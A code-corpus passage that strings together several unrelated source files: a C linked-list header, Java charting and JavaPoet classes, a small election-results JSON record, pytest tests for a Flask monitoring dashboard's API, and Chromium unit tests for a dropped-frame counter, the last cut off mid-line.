*list_at(list_t *list, size_t index); /* * Function: list_find * Find an element in a list. * * Parameters: * list - The list to search in. * element - The element to search for. * * Returns: * True if the element is found, false otherwise. * * Remarks: * Will thrash atcache and overwrite contents so that it reflects * all visited nodes in the linear search up to the invariant that * breaks out of the search. * * Other uses: * Using this function with element=NULL or an element which doesn't * exist is a great way to syncronize the atcache of the list. It * will force all nodes to be visited thus filling the atcache with * all the content it needs to make subsequent calls to list_at constant. */ bool list_find(list_t *list, const void *element); /* * Function: list_search * Search the list with a user-defined invariant via predicate. * * Parameters: * list - The list to search. * predicate - The predicate used for the invariant in the search. * pass - The information to pass to the predicate's second argument. * * Returns: * The element of some node in the linear search which was concluded to * when the predicate itself returned true. * * Other uses: * This function has the same other uses as list_find. Mainly it thrashes * the atcache and syncronizes it with the list. */ void *list_search(list_t *list, bool (*predicate)(const void *, const void *), const void *pass); /* * Function: list_copy * Perform a copy of a list. * * Parameters: * list - The list to copy. * * Returns: * A copied list. */ list_t *list_copy(list_t *list); /* * Function: list_length * Get the length of a list (i.e number of elements). * * Parameters: * list - The list to get the length of. * * Returns: * The amount of elements in the list. */ size_t list_length(list_t *list); /* * Function: list_foreach * Execute a callback passing in each value in the entire list * as well as passing in an additional pointer. * * Parameters: * list - The list to execute the callback over. * pass - The additional thing to pass in for the callback to * get as its second argument. * callback - Pointer to function callback. */ #define list_foreach(LIST, PASS, CALLBACK) \ list_foreach_impl((LIST), (PASS), (void (*)(void *, void *))(CALLBACK)) void list_foreach_impl(list_t *list, void *pass, void (*callback)(void *, void *)); /* * Function: list_erase * Erase an element in a list. * * Parameters: * list - The list to erase the element from. * element - The element to erase. * * Returns: * True if the element was found and erased, false otherwise. * * Remarks: * This thrashes the atcache of the list. */ bool list_erase(list_t *list, void *element); /* * Function: list_sort * Sort a list. * * Parameters: * list - The list to store * predicate - Pointer to function predicate that returns a boolean * transitive relationship for two elements of the list. * * Remarks: * This thrashes the atcache of the list. */ void list_sort(list_t *list, bool (*predicate)(const void *, const void *)); #endif
2,209
1,640
<filename>src/main/java/com/gitblit/wicket/charting/Chart.java /* * Copyright 2011 gitblit.com. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.gitblit.wicket.charting; import java.io.Serializable; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.TimeZone; import com.gitblit.Keys; import com.gitblit.utils.StringUtils; import com.gitblit.wicket.GitBlitWebApp; import com.gitblit.wicket.GitBlitWebSession; /** * Abstract parent class for different type of chart: bar, pie & line * * @author <NAME> * */ public abstract class Chart implements Serializable { private static final long serialVersionUID = 1L; final String tagId; final String dataName; final String title; final String keyName; final String valueName; final List<ChartValue> values; final List<ChartValue> highlights; int width; int height; boolean showLegend; String dateFormat = "MMM dd"; String clickUrl = null; public Chart(String tagId, String title, String keyName, String valueName) { this.tagId = tagId; this.dataName = StringUtils.getSHA1(tagId).substring(0, 8); this.title = title; this.keyName = keyName; this.valueName = valueName; values = new ArrayList<ChartValue>(); highlights = new ArrayList<ChartValue>(); showLegend = true; } public void setWidth(int width) { this.width = width; } public void setHeight(int height) { this.height = height; } public void setShowLegend(boolean val) { this.showLegend = val; } public void addValue(String name, int value) { values.add(new ChartValue(name, value)); } public void addValue(String name, float value) { values.add(new ChartValue(name, value)); } public void addValue(String name, double value) { values.add(new ChartValue(name, (float) value)); } public void addValue(Date date, int value) { values.add(new ChartValue(String.valueOf(date.getTime()), value)); } public void addHighlight(Date date, int value) { highlights.add(new ChartValue(String.valueOf(date.getTime()), value)); } protected abstract void appendChart(StringBuilder sb); protected void line(StringBuilder sb, String line) { sb.append(line); sb.append('\n'); } protected TimeZone getTimeZone() { return GitBlitWebApp.get().settings().getBoolean(Keys.web.useClientTimezone, false) ? GitBlitWebSession.get() .getTimezone() : GitBlitWebApp.get().getTimezone(); } protected class ChartValue implements Serializable, Comparable<ChartValue> { private static final long serialVersionUID = 1L; final String name; final float value; ChartValue(String name, float value) { this.name = name; this.value = value; } @Override public int compareTo(ChartValue o) { // sorts the dataset by largest value first if (value > o.value) { return -1; } else if (value < o.value) { return 1; } return 0; } } public String getDateFormat() { return dateFormat; } public void setDateFormat(String dateFormat) { this.dateFormat = dateFormat; } public String getClickUrl() { return clickUrl; } public void setClickUrl(String clickUrl) { this.clickUrl = clickUrl; } }
1,392
690
package com.squareup.javapoet; import com.artemis.generator.model.type.TypeDescriptor; import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import java.util.ArrayList; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; /** * Extends JavaPoet with TypeName resolver with support for {@link TypeDescriptor}. * * @see TypeDescriptor * @author <NAME> */ public class PoetTypeNameResolver { public TypeName get(Type type) { return get(type, new LinkedHashMap<Type, TypeVariableName>()); } private TypeName get(Type type, Map<Type, TypeVariableName> map) { if (type instanceof TypeDescriptor) { return ClassName.bestGuess(type.toString()); } if (type instanceof ParameterizedType) { return getForParameterizedTypes((ParameterizedType) type, map); } return TypeName.get(type); } private ParameterizedTypeName getForParameterizedTypes(ParameterizedType type, Map<Type, TypeVariableName> map) { // like ParameterizedTypeName.get, but with TypeDescriptor support. final ClassName rawType = ClassName.get((Class<?>) type.getRawType()); final ParameterizedType ownerType = (type.getOwnerType() instanceof ParameterizedType) && !java.lang.reflect.Modifier.isStatic(((Class<?>) type.getRawType()).getModifiers()) ? (ParameterizedType) type.getOwnerType() : null; List<TypeName> typeArguments = list(type.getActualTypeArguments(), map); return (ownerType != null) ? getForParameterizedTypes(ownerType, map) .nestedClass(rawType.simpleName(), typeArguments) : new ParameterizedTypeName(null, rawType, typeArguments); } private List<TypeName> list(Type[] types, Map<Type, TypeVariableName> map) { // TypeName.list, but with TypeDescriptor support. List<TypeName> result = new ArrayList<>(types.length); for (Type type : types) { result.add(get(type, map)); } return result; } }
814
2,083
<gh_stars>1000+ # test alignment feature keys('\\\\\\\\A') keys('\\\\\\\\a')
25
348
<filename>docs/data/leg-t2/057/05703155.json {"nom":"Courcelles-Chaussy","circ":"3ème circonscription","dpt":"Moselle","inscrits":2317,"abs":1450,"votants":867,"blancs":7,"nuls":62,"exp":798,"res":[{"nuance":"LR","nom":"<NAME>-<NAME>","voix":438},{"nuance":"REM","nom":"<NAME>","voix":360}]}
122
630
import pytest from flask_monitoringdashboard.database import Endpoint, Request @pytest.mark.parametrize('endpoint__monitor_level', [3]) def test_overview(dashboard_user, request_1, request_2, endpoint, session): response = dashboard_user.get('dashboard/api/overview') assert response.status_code == 200 [data] = [row for row in response.json if row['id'] == endpoint.id] assert data['hits-overall'] == 2 assert data['hits-today'] == 2 assert data['hits-today-errors'] == 0 assert data['hits-week'] == 2 assert data['hits-week-errors'] == 0 assert data['last-accessed'] == endpoint.last_requested.strftime("%a, %d %b %Y %H:%M:%S GMT") assert data['median-overall'] == (request_1.duration + request_2.duration) / 2 assert data['median-today'] == (request_1.duration + request_2.duration) / 2 assert data['median-week'] == (request_1.duration + request_2.duration) / 2 assert data['monitor'] == 3 assert data['name'] == endpoint.name @pytest.mark.parametrize('request_1__group_by', ['42']) @pytest.mark.parametrize('request_2__group_by', ['something else']) @pytest.mark.usefixtures('request_1', 'request_2') def test_users(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/users/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json row1, row2 = data assert row1['hits'] == 1 assert row1['user'] == '42' or 'something else' assert row2['hits'] == 1 assert row2['user'] == '42' or 'something else' @pytest.mark.parametrize('request_1__ip', ['42']) @pytest.mark.parametrize('request_2__ip', ['something else']) @pytest.mark.usefixtures('request_1', 'request_2') def test_ips(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/ip/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json row1, row2 = data assert row1['hits'] == 1 assert row1['ip'] == '42' or 'something else' assert row2['hits'] == 1 assert row2['ip'] == '42' or 'something else' def test_endpoints(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/endpoints') assert response.status_code == 200 assert len(response.json) == session.query(Endpoint).count() [data] = [row for row in response.json if row['id'] == str(endpoint.id)] assert data['last_requested'] == str(endpoint.last_requested) assert data['monitor_level'] == str(endpoint.monitor_level) assert data['name'] == endpoint.name assert data['time_added'] == str(endpoint.time_added) assert data['version_added'] == endpoint.version_added @pytest.mark.usefixtures('request_1', 'request_2') def test_endpoint_hits(dashboard_user, endpoint, session): response = dashboard_user.get('dashboard/api/endpoints_hits') assert response.status_code == 200 total_hits = sum(row['hits'] for row in response.json) assert total_hits == session.query(Request).count() [data] = [row for row in response.json if row['name'] == endpoint.name] assert data['hits'] == 2 def test_api_performance_get(dashboard_user): """GET is not allowed. It should return the overview page.""" response = dashboard_user.get('dashboard/api/api_performance') assert not response.is_json def test_api_performance_post(dashboard_user, request_1, endpoint, session): response = dashboard_user.post('dashboard/api/api_performance', json={ 'data': {'endpoints': [endpoint.name]} }) assert response.status_code == 200 [data] = response.json assert data['values'] == [request_1.duration] def test_set_rule_get(dashboard_user): """GET is not allowed. It should return the overview page.""" response = dashboard_user.get('dashboard/api/set_rule') assert not response.is_json @pytest.mark.parametrize('user__is_admin', [False]) def test_set_rule_post_guest_not_allowed(dashboard_user, endpoint): """Guest is redirected to the login page.""" response = dashboard_user.post('dashboard/api/set_rule', data={ 'name': endpoint.name, 'value': 3, }) assert response.status_code == 302 @pytest.mark.parametrize('endpoint__monitor_level', [1]) def test_set_rule_post(dashboard_user, endpoint, session): response = dashboard_user.post('dashboard/api/set_rule', data={ 'name': endpoint.name, 'value': 3, }) assert response.status_code == 200 assert response.data == b'OK' endpoint = session.query(Endpoint).get(endpoint.id) # reload the endpoint assert endpoint.monitor_level == 3 @pytest.mark.usefixtures('request_1') def test_endpoint_info(dashboard_user, endpoint): response = dashboard_user.get('dashboard/api/endpoint_info/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json assert data['endpoint'] == endpoint.name assert data['monitor-level'] == endpoint.monitor_level assert data['total_hits'] == 1 assert data['rules'] == ['/'] assert data['url'] == '/' @pytest.mark.parametrize('request_1__status_code', [404]) @pytest.mark.parametrize('request_2__status_code', [200]) @pytest.mark.usefixtures('request_1', 'request_2') def test_endpoint_status_code_distribution(dashboard_user, endpoint): response = dashboard_user.get('dashboard/api/endpoint_status_code_distribution/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json assert data['200'] == 1 / 2 assert data['404'] == 1 / 2 @pytest.mark.parametrize('request_1__status_code', [404]) @pytest.mark.parametrize('request_2__status_code', [200]) @pytest.mark.usefixtures('request_2') def test_endpoint_status_code_summary(dashboard_user, request_1, endpoint): response = dashboard_user.get('dashboard/api/endpoint_status_code_summary/{0}'.format(endpoint.id)) assert response.status_code == 200 data = response.json assert data['distribution'] == {'200': 1 / 2, '404': 1 / 2} [row] = data['error_requests'] assert row['duration'] == str(request_1.duration) assert row['endpoint_id'] == str(endpoint.id) assert row['group_by'] == str(request_1.group_by) assert row['id'] == str(request_1.id) assert row['ip'] == request_1.ip assert row['time_requested'] == str(request_1.time_requested) assert row['version_requested'] == request_1.version_requested def test_endpoint_versions_get(dashboard_user, endpoint): """GET is not allowed. It should return the overview page.""" response = dashboard_user.get('dashboard/api/endpoint_versions/{0}'.format(endpoint.id)) assert not response.is_json @pytest.mark.parametrize('request_1__version_requested', ['a']) @pytest.mark.parametrize('request_2__version_requested', ['b']) def test_endpoint_versions_post(dashboard_user, request_1, request_2, endpoint): response = dashboard_user.post( 'dashboard/api/endpoint_versions/{0}'.format(endpoint.id), json={'data': {'versions': [request_1.version_requested, request_2.version_requested]}}, ) assert response.status_code == 200 row1, row2 = response.json assert row1['version'] == request_1.version_requested assert row1['values'] == [request_1.duration] assert row2['version'] == request_2.version_requested assert row2['values'] == [request_2.duration] def test_endpoint_users_get(dashboard_user, endpoint): """GET is not allowed. It should return the overview page.""" response = dashboard_user.get('dashboard/api/endpoint_users/{0}'.format(endpoint.id)) assert not response.is_json @pytest.mark.parametrize('request_1__group_by', ['a']) @pytest.mark.parametrize('request_2__group_by', ['b']) def test_endpoint_users_post(dashboard_user, request_1, request_2, endpoint): response = dashboard_user.post( 'dashboard/api/endpoint_users/{0}'.format(endpoint.id), json={'data': {'users': [request_1.group_by, request_2.group_by]}}, ) assert response.status_code == 200 row1, row2 = response.json assert row1['user'] == request_1.group_by assert row1['values'] == [request_1.duration] assert row2['user'] == request_2.group_by assert row2['values'] == [request_2.duration]
2,978
14,668
<reponame>chromium/chromium // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "cc/metrics/dropped_frame_counter.h" #include <vector> #include "base/memory/raw_ptr.h" #include "base/synchronization/lock.h" #include "base/synchronization/waitable_event.h" #include "base/test/metrics/histogram_tester.h" #include "base/time/time.h" #include "build/chromeos_buildflags.h" #include "cc/animation/animation_host.h" #include "cc/test/fake_content_layer_client.h" #include "cc/test/fake_frame_info.h" #include "cc/test/fake_picture_layer.h" #include "cc/test/layer_tree_test.h" namespace cc { namespace { using SmoothnessStrategy = DroppedFrameCounter::SmoothnessStrategy; FrameInfo CreateStubFrameInfo(bool is_dropped) { return CreateFakeFrameInfo(is_dropped ? FrameInfo::FrameFinalState::kDropped : FrameInfo::FrameFinalState::kPresentedAll); } class DroppedFrameCounterTestBase : public LayerTreeTest { public: DroppedFrameCounterTestBase() = default; ~DroppedFrameCounterTestBase() override = default; virtual void SetUpTestConfigAndExpectations() = 0; void InitializeSettings(LayerTreeSettings* settings) override { settings->commit_to_active_tree = false; } void SetupTree() override { LayerTreeTest::SetupTree(); Layer* root_layer = layer_tree_host()->root_layer(); scroll_layer_ = FakePictureLayer::Create(&client_); // Set up the layer so it always has something to paint. scroll_layer_->set_always_update_resources(true); scroll_layer_->SetBounds({3, 3}); client_.set_bounds({3, 3}); root_layer->AddChild(scroll_layer_); } void RunTest(CompositorMode mode) override { SetUpTestConfigAndExpectations(); LayerTreeTest::RunTest(mode); } void BeginTest() override { ASSERT_GT(config_.animation_frames, 0u); // Start with requesting main-frames. PostSetNeedsCommitToMainThread(); } void AfterTest() override { EXPECT_GE(total_frames_, config_.animation_frames); // It is possible to drop even more frame than what the test expects (e.g. // in slower machines, slower builds such as asan/tsan builds, etc.), since // the test does not strictly control both threads and deadlines. Therefore, // it is not possible to check for strict equality here. EXPECT_LE(expect_.min_partial, partial_); EXPECT_LE(expect_.min_dropped, dropped_); EXPECT_LE(expect_.min_dropped_smoothness, dropped_smoothness_); } // Compositor thread function overrides: void WillBeginImplFrameOnThread(LayerTreeHostImpl* host_impl, const viz::BeginFrameArgs& args, bool has_damage) override { if (TestEnded()) return; // Request a re-draw, and set a non-empty damage region (otherwise the // draw is aborted with 'no damage'). host_impl->SetNeedsRedraw(); host_impl->SetViewportDamage(gfx::Rect(0, 0, 10, 20)); if (skip_main_thread_next_frame_) { skip_main_thread_next_frame_ = false; } else { // Request update from the main-thread too. host_impl->SetNeedsCommit(); } } void DrawLayersOnThread(LayerTreeHostImpl* host_impl) override { // If the main-thread is blocked, then unblock it once the compositor thread // has already drawn a frame. base::WaitableEvent* wait = nullptr; { base::AutoLock lock(wait_lock_); wait = wait_; } if (wait) { // When the main-thread blocks during a frame, skip the main-thread for // the next frame, so that the main-thread can be in sync with the // compositor thread again. skip_main_thread_next_frame_ = true; wait->Signal(); } } void DidReceivePresentationTimeOnThread( LayerTreeHostImpl* host_impl, uint32_t frame_token, const gfx::PresentationFeedback& feedback) override { ++presented_frames_; if (presented_frames_ < config_.animation_frames) return; auto* dropped_frame_counter = host_impl->dropped_frame_counter(); DCHECK(dropped_frame_counter); total_frames_ = dropped_frame_counter->total_frames(); partial_ = dropped_frame_counter->total_partial(); dropped_ = dropped_frame_counter->total_dropped(); dropped_smoothness_ = dropped_frame_counter->total_smoothness_dropped(); EndTest(); } // Main-thread function overrides: void BeginMainFrame(const viz::BeginFrameArgs& args) override { if (TestEnded()) return; bool should_wait = false; if (config_.should_drop_main_every > 0) { should_wait = args.frame_id.sequence_number % config_.should_drop_main_every == 0; } if (should_wait) { base::WaitableEvent wait{base::WaitableEvent::ResetPolicy::MANUAL, base::WaitableEvent::InitialState::NOT_SIGNALED}; { base::AutoLock lock(wait_lock_); wait_ = &wait; } wait.Wait(); { base::AutoLock lock(wait_lock_); wait_ = nullptr; } } // Make some changes so that the main-thread needs to push updates to the // compositor thread (i.e. force a commit). auto const bounds = scroll_layer_->bounds(); scroll_layer_->SetBounds({bounds.width(), bounds.height() + 1}); if (config_.should_register_main_thread_animation) { animation_host()->SetAnimationCounts(1); animation_host()->SetCurrentFrameHadRaf(true); animation_host()->SetNextFrameHasPendingRaf(true); } } protected: // The test configuration options. This is set before the test starts, and // remains unchanged after that. So it is safe to read these fields from // either threads. struct TestConfig { uint32_t should_drop_main_every = 0; uint32_t animation_frames = 0; bool should_register_main_thread_animation = false; } config_; // The test expectations. This is set before the test starts, and // remains unchanged after that. So it is safe to read these fields from // either threads. struct TestExpectation { uint32_t min_partial = 0; uint32_t min_dropped = 0; uint32_t min_dropped_smoothness = 0; } expect_; private: // Set up a dummy picture layer so that every begin-main frame requires a // commit (without the dummy layer, the main-thread never has to paint, which // causes an early 'no damage' abort of the main-frame. FakeContentLayerClient client_; scoped_refptr<FakePictureLayer> scroll_layer_; // This field is used only on the compositor thread to track how many frames // have been processed. uint32_t presented_frames_ = 0; // The |wait_| event is used when the test wants to deliberately force the // main-thread to block while processing begin-main-frames. base::Lock wait_lock_; raw_ptr<base::WaitableEvent> wait_ = nullptr; // These fields are populated in the compositor thread when the desired number // of frames have been processed. These fields are subsequently compared // against the expectation after the test ends. uint32_t total_frames_ = 0; uint32_t partial_ = 0; uint32_t dropped_ = 0; uint32_t dropped_smoothness_ = 0; bool skip_main_thread_next_frame_ = false; }; class DroppedFrameCounterNoDropTest : public DroppedFrameCounterTestBase { public: ~DroppedFrameCounterNoDropTest() override = default; void SetUpTestConfigAndExpectations() override { config_.animation_frames = 28; config_.should_register_main_thread_animation = false; expect_.min_partial = 0; expect_.min_dropped = 0; expect_.min_dropped_smoothness = 0; } }; MULTI_THREAD_TEST_F(DroppedFrameCounterNoDropTest); class DroppedFrameCounterMainDropsNoSmoothness : public DroppedFrameCounterTestBase { public: ~DroppedFrameCounterMainDropsNoSmoothness() override = default; void SetUpTestConfigAndExpectations() override { config_.animation_frames = 28; config_.should_drop_main_every = 5; config_.should_register_main_thread_animation = false; expect_.min_partial = 5; expect_.min_dropped_smoothness = 0; } }; // TODO(crbug.com/1115376) Disabled for flakiness. // MULTI_THREAD_TEST_F(DroppedFrameCounterMainDropsNoSmoothness); class DroppedFrameCounterMainDropsSmoothnessTest : public DroppedFrameCounterTestBase { public: ~DroppedFrameCounterMainDropsSmoothnessTest() override = default; void SetUpTestConfigAndExpectations() override { config_.animation_frames = 28; config_.should_drop_main_every = 5; config_.should_register_main_thread_animation = true; expect_.min_partial = 5; expect_.min_dropped_smoothness = 5; } }; // TODO(crbug.com/1115376) Disabled for flakiness. // MULTI_THREAD_TEST_F(DroppedFrameCounterMainDropsSmoothnessTest); class DroppedFrameCounterTest : public testing::Test { public: explicit DroppedFrameCounterTest(SmoothnessStrategy smoothness_strategy = SmoothnessStrategy::kDefaultStrategy) : smoothness_strategy_(smoothness_strategy) { dropped_frame_counter_.set_total_counter(&total_frame_counter_); dropped_frame_counter_.OnFcpReceived(); } ~DroppedFrameCounterTest() override = default; // For each boolean in frame_states produces a frame void SimulateFrameSequence(std::vector<bool> frame_states, int repeat) { for (int i = 0; i < repeat; i++) { for (auto is_dropped : frame_states) { viz::BeginFrameArgs args_ = SimulateBeginFrameArgs(); dropped_frame_counter_.OnBeginFrame(args_, /*is_scroll_active=*/false); dropped_frame_counter_.OnEndFrame(args_, CreateStubFrameInfo(is_dropped)); sequence_number_++; frame_time_ += interval_; } } } // Make a sequence of frame states where the first |dropped_frames| out of // |total_frames| are dropped. std::vector<bool> MakeFrameSequence(int dropped_frames, int total_frames) { std::vector<bool> frame_states(total_frames, false); for (int i = 0; i < dropped_frames; i++) { frame_states[i] = true; } return frame_states; } std::vector<viz::BeginFrameArgs> SimulatePendingFrame(int repeat) { std::vector<viz::BeginFrameArgs> args(repeat); for (int i = 0; i < repeat; i++) { args[i] = SimulateBeginFrameArgs(); dropped_frame_counter_.OnBeginFrame(args[i], /*is_scroll_active=*/false); sequence_number_++; frame_time_ += interval_; } return args; } // Simulate a main and impl thread update on the same frame. void SimulateForkedFrame(bool main_dropped, bool impl_dropped) { viz::BeginFrameArgs args_ = SimulateBeginFrameArgs(); dropped_frame_counter_.OnBeginFrame(args_, /*is_scroll_active=*/false); dropped_frame_counter_.OnBeginFrame(args_, /*is_scroll_active=*/false); // End the 'main thread' arm of the fork. auto main_info = CreateStubFrameInfo(main_dropped); main_info.main_thread_response = FrameInfo::MainThreadResponse::kIncluded; dropped_frame_counter_.OnEndFrame(args_, main_info); // End the 'compositor thread' arm of the fork. auto impl_info = CreateStubFrameInfo(impl_dropped); impl_info.main_thread_response = FrameInfo::MainThreadResponse::kMissing; dropped_frame_counter_.OnEndFrame(args_, impl_info); sequence_number_++; frame_time_ += interval_; } void AdvancetimeByIntervals(int interval_count) { frame_time_ += interval_ * interval_count; } double MaxPercentDroppedFrame() { return dropped_frame_counter_.sliding_window_max_percent_dropped(); } double MaxPercentDroppedFrameAfter1Sec() { auto percent_dropped = dropped_frame_counter_.max_percent_dropped_After_1_sec(); EXPECT_TRUE(percent_dropped.has_value()); return percent_dropped.value(); } double MaxPercentDroppedFrameAfter2Sec() { auto percent_dropped = dropped_frame_counter_.max_percent_dropped_After_2_sec(); EXPECT_TRUE(percent_dropped.has_value()); return percent_dropped.value(); } double MaxPercentDroppedFrameAfter5Sec() { auto percent_dropped = dropped_frame_counter_.max_percent_dropped_After_5_sec(); EXPECT_TRUE(percent_dropped.has_value()); return percent_dropped.value(); } double PercentDroppedFrame95Percentile() { return dropped_frame_counter_.SlidingWindow95PercentilePercentDropped( smoothness_strategy_); } double PercentDroppedFrameMedian() { return dropped_frame_counter_.SlidingWindowMedianPercentDropped( smoothness_strategy_); } double PercentDroppedFrameVariance() { return dropped_frame_counter_.SlidingWindowPercentDroppedVariance( smoothness_strategy_); } const DroppedFrameCounter::SlidingWindowHistogram* GetSlidingWindowHistogram() { return dropped_frame_counter_.GetSlidingWindowHistogram( smoothness_strategy_); } double GetTotalFramesInWindow() { return base::Seconds(1) / interval_; } void SetInterval(base::TimeDelta interval) { interval_ = interval; } base::TimeTicks GetNextFrameTime() const { return frame_time_ + interval_; } // Wrap calls with EXPECT_TRUE. Logs the buckets and returns false if they // don't match (within a given epsilon). bool CheckSmoothnessBuckets(std::vector<double> expected_buckets) { constexpr double epsilon = 0.001; bool buckets_match = true; std::vector<double> buckets = GetSlidingWindowHistogram()->GetPercentDroppedFrameBuckets(); if (buckets.size() != expected_buckets.size()) { buckets_match = false; } else { for (size_t i = 0; i < buckets.size(); i++) { if (std::abs(buckets[i] - expected_buckets[i]) > epsilon) { buckets_match = false; break; } } } if (!buckets_match) { LOG(ERROR) << "Smoothness buckets do not match!"; LOG(ERROR) << "Expected: " << testing::PrintToString(expected_buckets); LOG(ERROR) << " Actual: " << testing::PrintToString(buckets); } return buckets_match; } public: DroppedFrameCounter dropped_frame_counter_; private: TotalFrameCounter total_frame_counter_; uint64_t sequence_number_ = 1; uint64_t source_id_ = 1; raw_ptr<const base::TickClock> tick_clock_ = base::DefaultTickClock::GetInstance(); base::TimeTicks frame_time_ = tick_clock_->NowTicks(); base::TimeDelta interval_ = base::Microseconds(16667); // 16.667 ms SmoothnessStrategy smoothness_strategy_; viz::BeginFrameArgs SimulateBeginFrameArgs() { viz::BeginFrameId current_id_(source_id_, sequence_number_); viz::BeginFrameArgs args = viz::BeginFrameArgs(); args.frame_id = current_id_; args.frame_time = frame_time_; args.interval = interval_; return args; } }; // Test class that supports parameterized tests for each of the different // SmoothnessStrategy. // // TODO(jonross): when we build the other strategies parameterize the // expectations. class SmoothnessStrategyDroppedFrameCounterTest : public DroppedFrameCounterTest, public testing::WithParamInterface<SmoothnessStrategy> { public: SmoothnessStrategyDroppedFrameCounterTest() : DroppedFrameCounterTest(GetParam()) {} ~SmoothnessStrategyDroppedFrameCounterTest() override = default; SmoothnessStrategyDroppedFrameCounterTest( const SmoothnessStrategyDroppedFrameCounterTest&) = delete; SmoothnessStrategyDroppedFrameCounterTest& operator=( const SmoothnessStrategyDroppedFrameCounterTest&) = delete; }; INSTANTIATE_TEST_SUITE_P( DefaultStrategy, SmoothnessStrategyDroppedFrameCounterTest, ::testing::Values(SmoothnessStrategy::kDefaultStrategy)); TEST_P(SmoothnessStrategyDroppedFrameCounterTest, SimplePattern1) { // 2 out of every 3 frames are dropped (In total 80 frames out of 120). SimulateFrameSequence({true, true, true, false, true, false}, 20); // The max is the following window: // 16 * <sequence> + {true, true, true, false // Which means a max of 67 dropped frames. EXPECT_EQ(std::round(MaxPercentDroppedFrame()), 67); EXPECT_EQ(PercentDroppedFrame95Percentile(), 67); // all values are in the // 65th-67th bucket, and as a result 95th percentile is also 67. EXPECT_EQ(PercentDroppedFrameMedian(), 65); EXPECT_LE(PercentDroppedFrameVariance(), 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, SimplePattern2) { // 1 out of every 5 frames are dropped (In total 24 frames out of 120). SimulateFrameSequence({false, false, false, false, true}, 24); double expected_percent_dropped_frame = (12 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame); EXPECT_EQ(PercentDroppedFrame95Percentile(), 20); // all values are in the // 20th bucket, and as a result 95th percentile is also 20. EXPECT_EQ(PercentDroppedFrameMedian(), 20); EXPECT_LE(PercentDroppedFrameVariance(), 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, IncompleteWindow) { // There are only 5 frames submitted, so Max, 95pct, median and variance // should report zero. SimulateFrameSequence({false, false, false, false, true}, 1); EXPECT_EQ(MaxPercentDroppedFrame(), 0.0); EXPECT_EQ(PercentDroppedFrame95Percentile(), 0); EXPECT_EQ(PercentDroppedFrameMedian(), 0); EXPECT_LE(PercentDroppedFrameVariance(), 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, MaxPercentDroppedChanges) { // First 60 frames have 20% dropped. SimulateFrameSequence({false, false, false, false, true}, 12); double expected_percent_dropped_frame1 = (12 / GetTotalFramesInWindow()) * 100; EXPECT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame1); EXPECT_FLOAT_EQ(PercentDroppedFrame95Percentile(), 20); // There is only one // element in the histogram and that is 20. EXPECT_EQ(PercentDroppedFrameMedian(), 20); EXPECT_LE(PercentDroppedFrameVariance(), 1); // 30 new frames are added that have 18 dropped frames. // and the 30 frame before that had 6 dropped frames. // So in total in the window has 24 frames dropped out of 60 frames. SimulateFrameSequence({false, false, true, true, true}, 6); double expected_percent_dropped_frame2 = (24 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame2); // 30 new frames are added that have 24 dropped frames. // and the 30 frame before that had 18 dropped frames. // So in total in the window has 42 frames dropped out of 60 frames. SimulateFrameSequence({false, true, true, true, true}, 6); double expected_percent_dropped_frame3 = (42 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame3); // Percent dropped frame of window increases gradually to 70%. // 1 value exist when we reach 60 frames and 1 value thereafter for each // frame added. So there 61 values in histogram. Last value is 70 (2 sampels) // and then 67 with 1 sample, which would be the 95th percentile. EXPECT_EQ(PercentDroppedFrame95Percentile(), 67); } TEST_F(DroppedFrameCounterTest, MaxPercentDroppedWithIdleFrames) { // First 20 frames have 4 frames dropped (20%). SimulateFrameSequence({false, false, false, false, true}, 4); // Then no frames are added for 20 intervals. AdvancetimeByIntervals(20); // Then 20 frames have 16 frames dropped (60%). SimulateFrameSequence({false, false, true, true, true}, 4); // So in total, there are 40 frames in the 1 second window with 16 dropped // frames (40% in total). double expected_percent_dropped_frame = (16 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame); } TEST_F(DroppedFrameCounterTest, NoCrashForIntervalLargerThanWindow) { SetInterval(base::Milliseconds(1000)); SimulateFrameSequence({false, false}, 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, Percentile95WithIdleFrames) { // Test scenario: // . 4s of 20% dropped frames. // . 96s of idle time. // The 96%ile dropped-frame metric should be 0. // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); const auto* histogram = GetSlidingWindowHistogram(); // First 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); // Then no frames are added for 97s. Note that this 1s more than 96 seconds, // because the last second remains in the sliding window. AdvancetimeByIntervals(kFps * 97); // A single frame to flush the pipeline. SimulateFrameSequence({false}, 1); EXPECT_EQ(histogram->total_count(), 100u * kFps); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.96), 0u); EXPECT_GT(histogram->GetPercentDroppedFramePercentile(0.97), 